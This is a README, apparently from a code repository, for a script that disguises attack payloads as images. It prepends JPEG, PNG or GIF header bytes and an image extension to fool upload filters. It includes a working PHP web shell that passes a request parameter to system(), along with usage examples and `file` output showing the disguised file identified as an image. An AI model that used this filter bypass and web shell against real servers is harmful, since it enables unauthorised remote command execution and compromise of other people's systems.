You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
36 lines
1.1 KiB
36 lines
1.1 KiB
# Scripts for payload generation |
|
|
|
## generateImageFromPayload |
|
|
|
This script is designed to disguise a payload as an image. It does this by adding the first 20 bytes of a real image to the beginning of the file and adding a file extension. This will fool most filters that, for example, might only allow images to be uploaded. |
|
|
|
To use it, you will need to have a payload ready to use. It could be anything, here is a simple php script named payload.php |
|
|
|
```php |
|
<?php |
|
if( isset( $_REQUEST['jh'] ) ): |
|
system( $_REQUEST['jh'] ); |
|
endif; |
|
``` |
|
|
|
If I run `generateImageFromPayload payload.php`, the script will create a file called `payload.php.jpg`. |
|
|
|
``` |
|
. |
|
├── payload.php |
|
└── payload.php.jpg |
|
``` |
|
|
|
After running `file` on both, you will see that it incorrectly identifies the second as an image. |
|
|
|
```sh |
|
file payload.php* |
|
payload.php: PHP script, ASCII text |
|
payload.php.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16 |
|
``` |
|
|
|
The script will, by default, generate a jpg although you can specify png or gif by adding a second argument, e.g. |
|
|
|
``` |
|
generateImageFromPayload payload.php png |
|
```
|
|
|